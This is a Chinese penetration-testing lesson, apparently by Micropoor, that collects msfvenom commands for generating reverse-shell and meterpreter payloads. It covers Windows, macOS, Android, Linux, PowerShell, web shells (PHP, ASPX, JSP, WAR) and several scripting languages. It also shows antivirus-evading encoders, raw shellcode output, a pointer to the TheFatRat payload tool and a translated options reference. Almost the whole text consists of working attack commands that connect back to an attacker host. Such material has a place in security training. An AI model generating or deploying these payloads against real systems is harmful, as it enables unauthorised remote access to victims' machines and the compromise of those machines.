第十课:msfvenom常用生成payload命令

windows:

1
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp
2
LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe
Copied!

mac:

1
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho
Copied!

android:

1
//需要签名
2
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk
Copied!

powershell:

1
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
Copied!

linux:

1
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf
Copied!

php:

1
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
2
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
Copied!

aspx:

1
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
Copied!

jsp:

1
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp
Copied!

war:

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw - o payload.war
Copied!

nodejs:

1
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js
Copied!

python:

1
msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py
Copied!

perl:

1
msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl
Copied!

ruby:

1
msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb
Copied!

lua:

1
msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua
Copied!

windows shellcode:

1
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
Copied!

linux shellcode:

1
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
Copied!

mac shellcode:

1
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
Copied!

便捷化payload生成:

1
[email protected]:~/Desktop# git clone https://github.com/Screetsec/TheFatRat.git
2
//设置时需要挂墙
Copied!

附录:

中文使用说明:
1
Options:
2
3
-p, --payload <payload> 使用指定的payload
4
--payload-options 列出该payload参数
5
-l, --list [type] 列出所有的payloads
6
-n, --nopsled <length> 为payload指定一个 nopsled 长度
7
-f, --format <format> 指定payload生成格式
8
--help-formats 查看所有支持格式
9
-e, --encoder <encoder> 使用编码器
10
-a, --arch <arch> 指定payload构架
11
--platform <platform> 指定payload平台
12
--help-platforms 显示支持的平台
13
-s, --space <length> 设定payload攻击荷载的最大长度
14
--encoder-space <length> The maximum size of the encoded payload
15
16
(defaults to the -s value)
17
-b, --bad-chars <list> 指定bad-chars 如: '\x00\xff'
18
-i, --iterations <count> 指定编码次数
19
-c, --add-code <path> 指定个win32 shellcode 文件
20
-x, --template <path> 指定一个 executable 文件作为模板
21
-k, --keep payload自动分离并注入到新的进程
22
-o, --out <path> 存放生成的payload
23
-v, --var-name <name> 指定自定义变量
24
--smallest Generate the smallest possible payload
25
-h, --help 显示帮助文件
Copied!
--By Micropoor
Last modified 2yr ago